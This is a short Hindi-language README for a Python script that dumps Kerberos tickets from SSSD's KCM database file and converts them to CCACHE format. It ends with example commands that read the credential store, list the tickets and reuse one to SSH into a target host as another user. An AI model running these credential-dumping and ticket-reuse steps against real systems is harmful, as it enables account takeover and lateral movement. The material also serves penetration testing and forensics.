
SSSD के KCM डेटाबेस से Kerberos टिकट डंप करें
SSSD द्वारा उपयोग किए जाने वाले KCM डेटाबेस को डंप करने और Kerberos टिकटों को पुनर्प्राप्त करने के लिए त्वरित स्क्रिप्ट CCACHE प्रारूप में।
प्रारंभ में निम्न पर आधारित SSSDKCMExtractor और KCMTicketFormatter।
चूँकि संस्करण 2.0.0 (2018-08-13) से, SSSD के KCM रिस्पॉन्डर का बैक-एंड स्टोरेज अब डेटाबेस सामग्री को एन्क्रिप्ट नहीं करता है। हालाँकि, यह अभी भी एक LDB डेटाबेस पर निर्भर करता है (जो स्वयं TDB पर आधारित है), जिससे इसे LDAP-जैसी क्वेरी का उपयोग करके आसानी से खोजा जा सकता है।
SSSD Kerberos टिकटों के लिए एक कस्टम स्टोरेज प्रारूप का उपयोग करता है, जिसे इस स्क्रिप्ट का उपयोग करके मानक CCACHE फ़ाइलों में परिवर्तित किया जा सकता है।
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local